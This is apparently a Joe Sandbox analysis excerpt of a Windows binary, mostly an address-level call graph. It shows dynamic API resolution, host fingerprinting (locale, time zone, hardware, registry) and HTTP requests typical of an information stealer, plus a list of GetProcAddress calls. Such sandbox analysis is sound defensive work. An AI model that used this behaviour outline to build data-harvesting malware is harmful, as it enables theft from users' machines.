544144 14501->14502 14503 5445c0 2 API calls 14502->14503 14504 54415d 14503->14504 14505 5445c0 2 API calls 14504->14505 14506 544176 14505->14506 14507 5445c0 2 API calls 14506->14507 14508 54418f 14507->14508 14509 5445c0 2 API calls 14508->14509 14510 5441a8 14509->14510 14511 5445c0 2 API calls 14510->14511 14512 5441c1 14511->14512 14513 5445c0 2 API calls 14512->14513 14514 5441da 14513->14514 14515 5445c0 2 API calls 14514->14515 14516 5441f3 14515->14516 
14517 5445c0 2 API calls 14516->14517 14518 54420c 14517->14518 14519 5445c0 2 API calls 14518->14519 14520 544225 14519->14520 14521 5445c0 2 API calls 14520->14521 14522 54423e 14521->14522 14523 5445c0 2 API calls 14522->14523 14524 544257 14523->14524 14525 5445c0 2 API calls 14524->14525 14526 544270 14525->14526 14527 5445c0 2 API calls 14526->14527 14528 544289 14527->14528 14529 5445c0 2 API calls 14528->14529 14530 5442a2 14529->14530 14531 5445c0 2 API calls 14530->14531 14532 5442bb 14531->14532 14533 5445c0 2 API calls 14532->14533 14534 5442d4 14533->14534 14535 5445c0 2 API calls 14534->14535 14536 5442ed 14535->14536 14537 5445c0 2 API calls 14536->14537 14538 544306 14537->14538 14539 5445c0 2 API calls 14538->14539 14540 54431f 14539->14540 14541 5445c0 2 API calls 14540->14541 14542 544338 14541->14542 14543 5445c0 2 API calls 14542->14543 14544 544351 14543->14544 14545 5445c0 2 API calls 14544->14545 14546 54436a 14545->14546 14547 5445c0 2 API calls 14546->14547 14548 544383 14547->14548 14549 5445c0 2 API calls 14548->14549 14550 54439c 14549->14550 14551 5445c0 2 API calls 14550->14551 14552 5443b5 14551->14552 14553 5445c0 2 API calls 14552->14553 14554 5443ce 14553->14554 14555 5445c0 2 API calls 14554->14555 14556 5443e7 14555->14556 14557 5445c0 2 API calls 14556->14557 14558 544400 14557->14558 14559 5445c0 2 API calls 14558->14559 14560 544419 14559->14560 14561 5445c0 2 API calls 14560->14561 14562 544432 14561->14562 14563 5445c0 2 API calls 14562->14563 14564 54444b 14563->14564 14565 5445c0 2 API calls 14564->14565 14566 544464 14565->14566 14567 5445c0 2 API calls 14566->14567 14568 54447d 14567->14568 14569 5445c0 2 API calls 14568->14569 14570 544496 14569->14570 14571 5445c0 2 API calls 14570->14571 14572 5444af 14571->14572 14573 5445c0 2 API calls 14572->14573 14574 5444c8 14573->14574 14575 5445c0 2 API calls 14574->14575 14576 5444e1 14575->14576 14577 5445c0 2 API calls 14576->14577 14578 5444fa 14577->14578 14579 5445c0 2 
API calls 14578->14579 14580 544513 14579->14580 14581 5445c0 2 API calls 14580->14581 14582 54452c 14581->14582 14583 5445c0 2 API calls 14582->14583 14584 544545 14583->14584 14585 5445c0 2 API calls 14584->14585 14586 54455e 14585->14586 14587 5445c0 2 API calls 14586->14587 14588 544577 14587->14588 14589 5445c0 2 API calls 14588->14589 14590 544590 14589->14590 14591 5445c0 2 API calls 14590->14591 14592 5445a9 14591->14592 14593 559c10 14592->14593 14594 55a036 8 API calls 14593->14594 14595 559c20 43 API calls 14593->14595 14596 55a146 14594->14596 14597 55a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14594->14597 14595->14594 14598 55a216 14596->14598 14599 55a153 8 API calls 14596->14599 14597->14596 14600 55a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14598->14600 14601 55a298 14598->14601 14599->14598 14600->14601 14602 55a2a5 6 API calls 14601->14602 14603 55a337 14601->14603 14602->14603 14604 55a344 9 API calls 14603->14604 14605 55a41f 14603->14605 14604->14605 14606 55a4a2 14605->14606 14607 55a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14605->14607 14608 55a4dc 14606->14608 14609 55a4ab GetProcAddress GetProcAddress 14606->14609 14607->14606 14610 55a515 14608->14610 14611 55a4e5 GetProcAddress GetProcAddress 14608->14611 14609->14608 14612 55a612 14610->14612 14613 55a522 10 API calls 14610->14613 14611->14610 14614 55a67d 14612->14614 14615 55a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14612->14615 14613->14612 14616 55a686 GetProcAddress 14614->14616 14617 55a69e 14614->14617 14615->14614 14616->14617 14618 55a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14617->14618 14619 555ca3 14617->14619 14618->14619 14620 541590 14619->14620 15739 541670 14620->15739 14623 55a7a0 lstrcpy 14624 5415b5 14623->14624 14625 55a7a0 lstrcpy 14624->14625 14626 5415c7 14625->14626 14627 55a7a0 lstrcpy 14626->14627 14628 
5415d9 14627->14628 14629 55a7a0 lstrcpy 14628->14629 14630 541663 14629->14630 14631 555510 14630->14631 14632 555521 14631->14632 14633 55a820 2 API calls 14632->14633 14634 55552e 14633->14634 14635 55a820 2 API calls 14634->14635 14636 55553b 14635->14636 14637 55a820 2 API calls 14636->14637 14638 555548 14637->14638 14639 55a740 lstrcpy 14638->14639 14640 555555 14639->14640 14641 55a740 lstrcpy 14640->14641 14642 555562 14641->14642 14643 55a740 lstrcpy 14642->14643 14644 55556f 14643->14644 14645 55a740 lstrcpy 14644->14645 14685 55557c 14645->14685 14646 55a820 lstrlen lstrcpy 14646->14685 14647 55a740 lstrcpy 14647->14685 14648 55a8a0 lstrcpy 14648->14685 14649 555643 StrCmpCA 14649->14685 14650 5556a0 StrCmpCA 14651 5557dc 14650->14651 14650->14685 14653 55a8a0 lstrcpy 14651->14653 14652 55a7a0 lstrcpy 14652->14685 14654 5557e8 14653->14654 14655 55a820 2 API calls 14654->14655 14656 5557f6 14655->14656 14658 55a820 2 API calls 14656->14658 14657 555856 StrCmpCA 14659 555991 14657->14659 14657->14685 14661 555805 14658->14661 14660 55a8a0 lstrcpy 14659->14660 14663 55599d 14660->14663 14664 541670 lstrcpy 14661->14664 14662 541590 lstrcpy 14662->14685 14665 55a820 2 API calls 14663->14665 14684 555811 14664->14684 14667 5559ab 14665->14667 14666 5551f0 20 API calls 14666->14685 14669 55a820 2 API calls 14667->14669 14668 555a0b StrCmpCA 14670 555a16 Sleep 14668->14670 14671 555a28 14668->14671 14672 5559ba 14669->14672 14670->14685 14673 55a8a0 lstrcpy 14671->14673 14674 541670 lstrcpy 14672->14674 14675 555a34 14673->14675 14674->14684 14676 55a820 2 API calls 14675->14676 14677 555a43 14676->14677 14679 55a820 2 API calls 14677->14679 14678 5552c0 25 API calls 14678->14685 14680 555a52 14679->14680 14682 541670 lstrcpy 14680->14682 14681 55578a StrCmpCA 14681->14685 14682->14684 14683 55593f StrCmpCA 14683->14685 14684->13738 14685->14646 14685->14647 14685->14648 14685->14649 14685->14650 14685->14652 14685->14657 14685->14662 14685->14666 
14685->14668 14685->14678 14685->14681 14685->14683 14687 557553 GetVolumeInformationA 14686->14687 14688 55754c 14686->14688 14694 557591 14687->14694 14688->14687 14689 5575fc GetProcessHeap RtlAllocateHeap 14690 557619 14689->14690 14691 557628 wsprintfA 14689->14691 14692 55a740 lstrcpy 14690->14692 14693 55a740 lstrcpy 14691->14693 14695 555da7 14692->14695 14693->14695 14694->14689 14695->13759 14697 55a7a0 lstrcpy 14696->14697 14698 544899 14697->14698 15748 5447b0 14698->15748 14700 5448a5 14701 55a740 lstrcpy 14700->14701 14702 5448d7 14701->14702 14703 55a740 lstrcpy 14702->14703 14704 5448e4 14703->14704 14705 55a740 lstrcpy 14704->14705 14706 5448f1 14705->14706 14707 55a740 lstrcpy 14706->14707 14708 5448fe 14707->14708 14709 55a740 lstrcpy 14708->14709 14710 54490b InternetOpenA StrCmpCA 14709->14710 14711 544944 14710->14711 14712 544ecb InternetCloseHandle 14711->14712 15754 558b60 14711->15754 14714 544ee8 14712->14714 15769 549ac0 CryptStringToBinaryA 14714->15769 14715 544963 15762 55a920 14715->15762 14718 544976 14720 55a8a0 lstrcpy 14718->14720 14726 54497f 14720->14726 14721 55a820 2 API calls 14722 544f05 14721->14722 14724 55a9b0 4 API calls 14722->14724 14723 544f27 codecvt 14728 55a7a0 lstrcpy 14723->14728 14725 544f1b 14724->14725 14727 55a8a0 lstrcpy 14725->14727 14729 55a9b0 4 API calls 14726->14729 14727->14723 14740 544f57 14728->14740 14730 5449a9 14729->14730 14731 55a8a0 lstrcpy 14730->14731 14732 5449b2 14731->14732 14733 55a9b0 4 API calls 14732->14733 14734 5449d1 14733->14734 14735 55a8a0 lstrcpy 14734->14735 14736 5449da 14735->14736 14737 55a920 3 API calls 14736->14737 14738 5449f8 14737->14738 14739 55a8a0 lstrcpy 14738->14739 14741 544a01 14739->14741 14740->13762 14742 55a9b0 4 API calls 14741->14742 14743 544a20 14742->14743 14744 55a8a0 lstrcpy 14743->14744 14745 544a29 14744->14745 14746 55a9b0 4 API calls 14745->14746 14747 544a48 14746->14747 14748 55a8a0 lstrcpy 14747->14748 14749 544a51 14748->14749 14750 55a9b0 4 
API calls 14749->14750 14751 544a7d 14750->14751 14752 55a920 3 API calls 14751->14752 14753 544a84 14752->14753 14754 55a8a0 lstrcpy 14753->14754 14755 544a8d 14754->14755 14756 544aa3 InternetConnectA 14755->14756 14756->14712 14757 544ad3 HttpOpenRequestA 14756->14757 14759 544ebe InternetCloseHandle 14757->14759 14760 544b28 14757->14760 14759->14712 14761 55a9b0 4 API calls 14760->14761 14762 544b3c 14761->14762 14763 55a8a0 lstrcpy 14762->14763 14764 544b45 14763->14764 14765 55a920 3 API calls 14764->14765 14766 544b63 14765->14766 14767 55a8a0 lstrcpy 14766->14767 14768 544b6c 14767->14768 14769 55a9b0 4 API calls 14768->14769 14770 544b8b 14769->14770 14771 55a8a0 lstrcpy 14770->14771 14772 544b94 14771->14772 14773 55a9b0 4 API calls 14772->14773 14774 544bb5 14773->14774 14775 55a8a0 lstrcpy 14774->14775 14776 544bbe 14775->14776 14777 55a9b0 4 API calls 14776->14777 14778 544bde 14777->14778 14779 55a8a0 lstrcpy 14778->14779 14780 544be7 14779->14780 14781 55a9b0 4 API calls 14780->14781 14782 544c06 14781->14782 14783 55a8a0 lstrcpy 14782->14783 14784 544c0f 14783->14784 14785 55a920 3 API calls 14784->14785 14786 544c2d 14785->14786 14787 55a8a0 lstrcpy 14786->14787 14788 544c36 14787->14788 14789 55a9b0 4 API calls 14788->14789 14790 544c55 14789->14790 14791 55a8a0 lstrcpy 14790->14791 14792 544c5e 14791->14792 14793 55a9b0 4 API calls 14792->14793 14794 544c7d 14793->14794 14795 55a8a0 lstrcpy 14794->14795 14796 544c86 14795->14796 14797 55a920 3 API calls 14796->14797 14798 544ca4 14797->14798 14799 55a8a0 lstrcpy 14798->14799 14800 544cad 14799->14800 14801 55a9b0 4 API calls 14800->14801 14802 544ccc 14801->14802 14803 55a8a0 lstrcpy 14802->14803 14804 544cd5 14803->14804 14805 55a9b0 4 API calls 14804->14805 14806 544cf6 14805->14806 14807 55a8a0 lstrcpy 14806->14807 14808 544cff 14807->14808 14809 55a9b0 4 API calls 14808->14809 14810 544d1f 14809->14810 14811 55a8a0 lstrcpy 14810->14811 14812 544d28 14811->14812 14813 55a9b0 4 API calls 
14812->14813 14814 544d47 14813->14814 14815 55a8a0 lstrcpy 14814->14815 14816 544d50 14815->14816 14817 55a920 3 API calls 14816->14817 14818 544d6e 14817->14818 14819 55a8a0 lstrcpy 14818->14819 14820 544d77 14819->14820 14821 55a740 lstrcpy 14820->14821 14822 544d92 14821->14822 14823 55a920 3 API calls 14822->14823 14824 544db3 14823->14824 14825 55a920 3 API calls 14824->14825 14826 544dba 14825->14826 14827 55a8a0 lstrcpy 14826->14827 14828 544dc6 14827->14828 14829 544de7 lstrlen 14828->14829 14830 544dfa 14829->14830 14831 544e03 lstrlen 14830->14831 15768 55aad0 14831->15768 14833 544e13 HttpSendRequestA 14834 544e32 InternetReadFile 14833->14834 14835 544e67 InternetCloseHandle 14834->14835 14840 544e5e 14834->14840 14837 55a800 14835->14837 14837->14759 14838 55a9b0 4 API calls 14838->14840 14839 55a8a0 lstrcpy 14839->14840 14840->14834 14840->14835 14840->14838 14840->14839 15775 55aad0 14841->15775 14843 5517c4 StrCmpCA 14844 5517d7 14843->14844 14845 5517cf ExitProcess 14843->14845 14846 5519c2 14844->14846 14847 5518f1 StrCmpCA 14844->14847 14848 551951 StrCmpCA 14844->14848 14849 551970 StrCmpCA 14844->14849 14850 551913 StrCmpCA 14844->14850 14851 551932 StrCmpCA 14844->14851 14852 55185d StrCmpCA 14844->14852 14853 55187f StrCmpCA 14844->14853 14854 5518ad StrCmpCA 14844->14854 14855 5518cf StrCmpCA 14844->14855 14856 55a820 lstrlen lstrcpy 14844->14856 14846->13764 14847->14844 14848->14844 14849->14844 14850->14844 14851->14844 14852->14844 14853->14844 14854->14844 14855->14844 14856->14844 14858 55a7a0 lstrcpy 14857->14858 14859 545979 14858->14859 14860 5447b0 2 API calls 14859->14860 14861 545985 14860->14861 14862 55a740 lstrcpy 14861->14862 14863 5459ba 14862->14863 14864 55a740 lstrcpy 14863->14864 14865 5459c7 14864->14865 14866 55a740 lstrcpy 14865->14866 14867 5459d4 14866->14867 14868 55a740 lstrcpy 14867->14868 14869 5459e1 14868->14869 14870 55a740 lstrcpy 14869->14870 14871 5459ee InternetOpenA StrCmpCA 14870->14871 14872 545a1d 
14871->14872 14873 545fc3 InternetCloseHandle 14872->14873 14874 558b60 3 API calls 14872->14874 14875 545fe0 14873->14875 14876 545a3c 14874->14876 14878 549ac0 4 API calls 14875->14878 14877 55a920 3 API calls 14876->14877 14879 545a4f 14877->14879 14880 545fe6 14878->14880 14881 55a8a0 lstrcpy 14879->14881 14882 55a820 2 API calls 14880->14882 14884 54601f codecvt 14880->14884 14886 545a58 14881->14886 14883 545ffd 14882->14883 14885 55a9b0 4 API calls 14883->14885 14888 55a7a0 lstrcpy 14884->14888 14887 546013 14885->14887 14890 55a9b0 4 API calls 14886->14890 14889 55a8a0 lstrcpy 14887->14889 14898 54604f 14888->14898 14889->14884 14891 545a82 14890->14891 14892 55a8a0 lstrcpy 14891->14892 14893 545a8b 14892->14893 14894 55a9b0 4 API calls 14893->14894 14895 545aaa 14894->14895 14896 55a8a0 lstrcpy 14895->14896 14897 545ab3 14896->14897 14899 55a920 3 API calls 14897->14899 14898->13770 14900 545ad1 14899->14900 14901 55a8a0 lstrcpy 14900->14901 14902 545ada 14901->14902 14903 55a9b0 4 API calls 14902->14903 14904 545af9 14903->14904 14905 55a8a0 lstrcpy 14904->14905 14906 545b02 14905->14906 14907 55a9b0 4 API calls 14906->14907 14908 545b21 14907->14908 14909 55a8a0 lstrcpy 14908->14909 14910 545b2a 14909->14910 14911 55a9b0 4 API calls 14910->14911 14912 545b56 14911->14912 14913 55a920 3 API calls 14912->14913 14914 545b5d 14913->14914 14915 55a8a0 lstrcpy 14914->14915 14916 545b66 14915->14916 14917 545b7c InternetConnectA 14916->14917 14917->14873 14918 545bac HttpOpenRequestA 14917->14918 14920 545fb6 InternetCloseHandle 14918->14920 14921 545c0b 14918->14921 14920->14873 14922 55a9b0 4 API calls 14921->14922 14923 545c1f 14922->14923 14924 55a8a0 lstrcpy 14923->14924 14925 545c28 14924->14925 14926 55a920 3 API calls 14925->14926 14927 545c46 14926->14927 14928 55a8a0 lstrcpy 14927->14928 14929 545c4f 14928->14929 14930 55a9b0 4 API calls 14929->14930 14931 545c6e 14930->14931 14932 55a8a0 lstrcpy 14931->14932 14933 545c77 14932->14933 14934 55a9b0 4 
API calls 14933->14934 14935 545c98 14934->14935 14936 55a8a0 lstrcpy 14935->14936 14937 545ca1 14936->14937 14938 55a9b0 4 API calls 14937->14938 14939 545cc1 14938->14939 14940 55a8a0 lstrcpy 14939->14940 14941 545cca 14940->14941 14942 55a9b0 4 API calls 14941->14942 14943 545ce9 14942->14943 14944 55a8a0 lstrcpy 14943->14944 14945 545cf2 14944->14945 14946 55a920 3 API calls 14945->14946 14947 545d10 14946->14947 14948 55a8a0 lstrcpy 14947->14948 14949 545d19 14948->14949 14950 55a9b0 4 API calls 14949->14950 14951 545d38 14950->14951 14952 55a8a0 lstrcpy 14951->14952 14953 545d41 14952->14953 14954 55a9b0 4 API calls 14953->14954 14955 545d60 14954->14955 14956 55a8a0 lstrcpy 14955->14956 14957 545d69 14956->14957 14958 55a920 3 API calls 14957->14958 14959 545d87 14958->14959 14960 55a8a0 lstrcpy 14959->14960 14961 545d90 14960->14961 14962 55a9b0 4 API calls 14961->14962 14963 545daf 14962->14963 14964 55a8a0 lstrcpy 14963->14964 14965 545db8 14964->14965 14966 55a9b0 4 API calls 14965->14966 14967 545dd9 14966->14967 14968 55a8a0 lstrcpy 14967->14968 14969 545de2 14968->14969 14970 55a9b0 4 API calls 14969->14970 14971 545e02 14970->14971 14972 55a8a0 lstrcpy 14971->14972 14973 545e0b 14972->14973 14974 55a9b0 4 API calls 14973->14974 14975 545e2a 14974->14975 14976 55a8a0 lstrcpy 14975->14976 14977 545e33 14976->14977 14978 55a920 3 API calls 14977->14978 14979 545e54 14978->14979 14980 55a8a0 lstrcpy 14979->14980 14981 545e5d 14980->14981 14982 545e70 lstrlen 14981->14982 15776 55aad0 14982->15776 14984 545e81 lstrlen GetProcessHeap RtlAllocateHeap 15777 55aad0 14984->15777 14986 545eae lstrlen 14987 545ebe 14986->14987 14988 545ed7 lstrlen 14987->14988 14989 545ee7 14988->14989 14990 545ef0 lstrlen 14989->14990 14991 545f03 14990->14991 14992 545f1a lstrlen 14991->14992 15778 55aad0 14992->15778 14994 545f2a HttpSendRequestA 14995 545f35 InternetReadFile 14994->14995 14996 545f6a InternetCloseHandle 14995->14996 15000 545f61 14995->15000 14996->14920 
14998 55a9b0 4 API calls 14998->15000 14999 55a8a0 lstrcpy 14999->15000 15000->14995 15000->14996 15000->14998 15000->14999 15003 551077 15001->15003 15002 551151 15002->13772 15003->15002 15004 55a820 lstrlen lstrcpy 15003->15004 15004->15003 15006 550db7 15005->15006 15007 550f17 15006->15007 15008 550ea4 StrCmpCA 15006->15008 15009 550e27 StrCmpCA 15006->15009 15010 550e67 StrCmpCA 15006->15010 15011 55a820 lstrlen lstrcpy 15006->15011 15007->13780 15008->15006 15009->15006 15010->15006 15011->15006 15015 550f67 15012->15015 15013 551044 15013->13788 15014 550fb2 StrCmpCA 15014->15015 15015->15013 15015->15014 15016 55a820 lstrlen lstrcpy 15015->15016 15016->15015 15018 55a740 lstrcpy 15017->15018 15019 551a26 15018->15019 15020 55a9b0 4 API calls 15019->15020 15021 551a37 15020->15021 15022 55a8a0 lstrcpy 15021->15022 15023 551a40 15022->15023 15024 55a9b0 4 API calls 15023->15024 15025 551a5b 15024->15025 15026 55a8a0 lstrcpy 15025->15026 15027 551a64 15026->15027 15028 55a9b0 4 API calls 15027->15028 15029 551a7d 15028->15029 15030 55a8a0 lstrcpy 15029->15030 15031 551a86 15030->15031 15032 55a9b0 4 API calls 15031->15032 15033 551aa1 15032->15033 15034 55a8a0 lstrcpy 15033->15034 15035 551aaa 15034->15035 15036 55a9b0 4 API calls 15035->15036 15037 551ac3 15036->15037 15038 55a8a0 lstrcpy 15037->15038 15039 551acc 15038->15039 15040 55a9b0 4 API calls 15039->15040 15041 551ae7 15040->15041 15042 55a8a0 lstrcpy 15041->15042 15043 551af0 15042->15043 15044 55a9b0 4 API calls 15043->15044 15045 551b09 15044->15045 15046 55a8a0 lstrcpy 15045->15046 15047 551b12 15046->15047 15048 55a9b0 4 API calls 15047->15048 15049 551b2d 15048->15049 15050 55a8a0 lstrcpy 15049->15050 15051 551b36 15050->15051 15052 55a9b0 4 API calls 15051->15052 15053 551b4f 15052->15053 15054 55a8a0 lstrcpy 15053->15054 15055 551b58 15054->15055 15056 55a9b0 4 API calls 15055->15056 15057 551b76 15056->15057 15058 55a8a0 lstrcpy 15057->15058 15059 551b7f 15058->15059 15060 557500 6 API 
calls 15059->15060 15061 551b96 15060->15061 15062 55a920 3 API calls 15061->15062 15063 551ba9 15062->15063 15064 55a8a0 lstrcpy 15063->15064 15065 551bb2 15064->15065 15066 55a9b0 4 API calls 15065->15066 15067 551bdc 15066->15067 15068 55a8a0 lstrcpy 15067->15068 15069 551be5 15068->15069 15070 55a9b0 4 API calls 15069->15070 15071 551c05 15070->15071 15072 55a8a0 lstrcpy 15071->15072 15073 551c0e 15072->15073 15779 557690 GetProcessHeap RtlAllocateHeap 15073->15779 15076 55a9b0 4 API calls 15077 551c2e 15076->15077 15078 55a8a0 lstrcpy 15077->15078 15079 551c37 15078->15079 15080 55a9b0 4 API calls 15079->15080 15081 551c56 15080->15081 15082 55a8a0 lstrcpy 15081->15082 15083 551c5f 15082->15083 15084 55a9b0 4 API calls 15083->15084 15085 551c80 15084->15085 15086 55a8a0 lstrcpy 15085->15086 15087 551c89 15086->15087 15786 5577c0 GetCurrentProcess IsWow64Process 15087->15786 15090 55a9b0 4 API calls 15091 551ca9 15090->15091 15092 55a8a0 lstrcpy 15091->15092 15093 551cb2 15092->15093 15094 55a9b0 4 API calls 15093->15094 15095 551cd1 15094->15095 15096 55a8a0 lstrcpy 15095->15096 15097 551cda 15096->15097 15098 55a9b0 4 API calls 15097->15098 15099 551cfb 15098->15099 15100 55a8a0 lstrcpy 15099->15100 15101 551d04 15100->15101 15102 557850 3 API calls 15101->15102 15103 551d14 15102->15103 15104 55a9b0 4 API calls 15103->15104 15105 551d24 15104->15105 15106 55a8a0 lstrcpy 15105->15106 15107 551d2d 15106->15107 15108 55a9b0 4 API calls 15107->15108 15109 551d4c 15108->15109 15110 55a8a0 lstrcpy 15109->15110 15111 551d55 15110->15111 15112 55a9b0 4 API calls 15111->15112 15113 551d75 15112->15113 15114 55a8a0 lstrcpy 15113->15114 15115 551d7e 15114->15115 15116 5578e0 3 API calls 15115->15116 15117 551d8e 15116->15117 15118 55a9b0 4 API calls 15117->15118 15119 551d9e 15118->15119 15120 55a8a0 lstrcpy 15119->15120 15121 551da7 15120->15121 15122 55a9b0 4 API calls 15121->15122 15123 551dc6 15122->15123 15124 55a8a0 lstrcpy 15123->15124 15125 551dcf 15124->15125 
15126 55a9b0 4 API calls 15125->15126 15127 551df0 15126->15127 15128 55a8a0 lstrcpy 15127->15128 15129 551df9 15128->15129 15788 557980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15129->15788 15132 55a9b0 4 API calls 15133 551e19 15132->15133 15134 55a8a0 lstrcpy 15133->15134 15135 551e22 15134->15135 15136 55a9b0 4 API calls 15135->15136 15137 551e41 15136->15137 15138 55a8a0 lstrcpy 15137->15138 15139 551e4a 15138->15139 15140 55a9b0 4 API calls 15139->15140 15141 551e6b 15140->15141 15142 55a8a0 lstrcpy 15141->15142 15143 551e74 15142->15143 15790 557a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15143->15790 15146 55a9b0 4 API calls 15147 551e94 15146->15147 15148 55a8a0 lstrcpy 15147->15148 15149 551e9d 15148->15149 15150 55a9b0 4 API calls 15149->15150 15151 551ebc 15150->15151 15152 55a8a0 lstrcpy 15151->15152 15153 551ec5 15152->15153 15154 55a9b0 4 API calls 15153->15154 15155 551ee5 15154->15155 15156 55a8a0 lstrcpy 15155->15156 15157 551eee 15156->15157 15793 557b00 GetUserDefaultLocaleName 15157->15793 15160 55a9b0 4 API calls 15161 551f0e 15160->15161 15162 55a8a0 lstrcpy 15161->15162 15163 551f17 15162->15163 15164 55a9b0 4 API calls 15163->15164 15165 551f36 15164->15165 15166 55a8a0 lstrcpy 15165->15166 15167 551f3f 15166->15167 15168 55a9b0 4 API calls 15167->15168 15169 551f60 15168->15169 15170 55a8a0 lstrcpy 15169->15170 15171 551f69 15170->15171 15797 557b90 15171->15797 15173 551f80 15174 55a920 3 API calls 15173->15174 15175 551f93 15174->15175 15176 55a8a0 lstrcpy 15175->15176 15177 551f9c 15176->15177 15178 55a9b0 4 API calls 15177->15178 15179 551fc6 15178->15179 15180 55a8a0 lstrcpy 15179->15180 15181 551fcf 15180->15181 15182 55a9b0 4 API calls 15181->15182 15183 551fef 15182->15183 15184 55a8a0 lstrcpy 15183->15184 15185 551ff8 15184->15185 15809 557d80 GetSystemPowerStatus 15185->15809 15188 55a9b0 4 API calls 15189 552018 15188->15189 15190 55a8a0 lstrcpy 15189->15190 15191 552021 15190->15191 15192 55a9b0 4 API 
calls 15191->15192 15193 552040 15192->15193 15194 55a8a0 lstrcpy 15193->15194 15195 552049 15194->15195 15196 55a9b0 4 API calls 15195->15196 15197 55206a 15196->15197 15198 55a8a0 lstrcpy 15197->15198 15199 552073 15198->15199 15200 55207e GetCurrentProcessId 15199->15200 15811 559470 OpenProcess 15200->15811 15203 55a920 3 API calls 15204 5520a4 15203->15204 15205 55a8a0 lstrcpy 15204->15205 15206 5520ad 15205->15206 15207 55a9b0 4 API calls 15206->15207 15208 5520d7 15207->15208 15209 55a8a0 lstrcpy 15208->15209 15210 5520e0 15209->15210 15211 55a9b0 4 API calls 15210->15211 15212 552100 15211->15212 15213 55a8a0 lstrcpy 15212->15213 15214 552109 15213->15214 15816 557e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15214->15816 15217 55a9b0 4 API calls 15218 552129 15217->15218 15219 55a8a0 lstrcpy 15218->15219 15220 552132 15219->15220 15221 55a9b0 4 API calls 15220->15221 15222 552151 15221->15222 15223 55a8a0 lstrcpy 15222->15223 15224 55215a 15223->15224 15225 55a9b0 4 API calls 15224->15225 15226 55217b 15225->15226 15227 55a8a0 lstrcpy 15226->15227 15228 552184 15227->15228 15820 557f60 15228->15820 15231 55a9b0 4 API calls 15232 5521a4 15231->15232 15233 55a8a0 lstrcpy 15232->15233 15234 5521ad 15233->15234 15235 55a9b0 4 API calls 15234->15235 15236 5521cc 15235->15236 15237 55a8a0 lstrcpy 15236->15237 15238 5521d5 15237->15238 15239 55a9b0 4 API calls 15238->15239 15240 5521f6 15239->15240 15241 55a8a0 lstrcpy 15240->15241 15242 5521ff 15241->15242 15833 557ed0 GetSystemInfo wsprintfA 15242->15833 15245 55a9b0 4 API calls 15246 55221f 15245->15246 15247 55a8a0 lstrcpy 15246->15247 15248 552228 15247->15248 15249 55a9b0 4 API calls 15248->15249 15250 552247 15249->15250 15251 55a8a0 lstrcpy 15250->15251 15252 552250 15251->15252 15253 55a9b0 4 API calls 15252->15253 15254 552270 15253->15254 15255 55a8a0 lstrcpy 15254->15255 15256 552279 15255->15256 15835 558100 GetProcessHeap RtlAllocateHeap 15256->15835 15259 55a9b0 4 API calls 15260 552299 

                          Control-flow Graph

                          control_flow_graph 660 559860-559874 call 559750 663 559a93-559af2 LoadLibraryA * 5 660->663 664 55987a-559a8e call 559780 GetProcAddress * 21 660->664 666 559af4-559b08 GetProcAddress 663->666 667 559b0d-559b14 663->667 664->663 666->667 669 559b46-559b4d 667->669 670 559b16-559b41 GetProcAddress * 2 667->670 671 559b4f-559b63 GetProcAddress 669->671 672 559b68-559b6f 669->672 670->669 671->672 673 559b71-559b84 GetProcAddress 672->673 674 559b89-559b90 672->674 673->674 675 559bc1-559bc2 674->675 676 559b92-559bbc GetProcAddress * 2 674->676 676->675
                          APIs
                          • GetProcAddress.KERNEL32(76210000,012316B0), ref: 005598A1
                          • GetProcAddress.KERNEL32(76210000,012315D8), ref: 005598BA
                          • GetProcAddress.KERNEL32(76210000,012314E8), ref: 005598D2
                          • GetProcAddress.KERNEL32(76210000,01231500), ref: 005598EA
                          • GetProcAddress.KERNEL32(76210000,01231560), ref: 00559903
                          • GetProcAddress.KERNEL32(76210000,01238908), ref: 0055991B
                          • GetProcAddress.KERNEL32(76210000,01225628), ref: 00559933
                          • GetProcAddress.KERNEL32(76210000,012255A8), ref: 0055994C
                          • GetProcAddress.KERNEL32(76210000,01231608), ref: 00559964
                          • GetProcAddress.KERNEL32(76210000,012316C8), ref: 0055997C
                          • GetProcAddress.KERNEL32(76210000,01231770), ref: 00559995
                          • GetProcAddress.KERNEL32(76210000,01231758), ref: 005599AD
                          • GetProcAddress.KERNEL32(76210000,01225608), ref: 005599C5
                          • GetProcAddress.KERNEL32(76210000,01231530), ref: 005599DE
                          • GetProcAddress.KERNEL32(76210000,012316E0), ref: 005599F6
                          • GetProcAddress.KERNEL32(76210000,01225648), ref: 00559A0E
                          • GetProcAddress.KERNEL32(76210000,012316F8), ref: 00559A27
                          • GetProcAddress.KERNEL32(76210000,01231578), ref: 00559A3F
                          • GetProcAddress.KERNEL32(76210000,01225448), ref: 00559A57
                          • GetProcAddress.KERNEL32(76210000,01231818), ref: 00559A70
                          • GetProcAddress.KERNEL32(76210000,012254E8), ref: 00559A88
                          • LoadLibraryA.KERNEL32(01231890,?,00556A00), ref: 00559A9A
                          • LoadLibraryA.KERNEL32(01231878,?,00556A00), ref: 00559AAB
                          • LoadLibraryA.KERNEL32(012317E8,?,00556A00), ref: 00559ABD
                          • LoadLibraryA.KERNEL32(01231800,?,00556A00), ref: 00559ACF
                          • LoadLibraryA.KERNEL32(012318A8,?,00556A00), ref: 00559AE0
                          • GetProcAddress.KERNEL32(75B30000,01231830), ref: 00559B02
                          • GetProcAddress.KERNEL32(751E0000,01231848), ref: 00559B23
                          • GetProcAddress.KERNEL32(751E0000,01231860), ref: 00559B3B
                          • GetProcAddress.KERNEL32(76910000,01238E30), ref: 00559B5D
                          • GetProcAddress.KERNEL32(75670000,01225368), ref: 00559B7E
                          • GetProcAddress.KERNEL32(77310000,01238988), ref: 00559B9F
                          • GetProcAddress.KERNEL32(77310000,NtQueryInformationProcess), ref: 00559BB6
                          Strings
                          • NtQueryInformationProcess, xrefs: 00559BAA
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
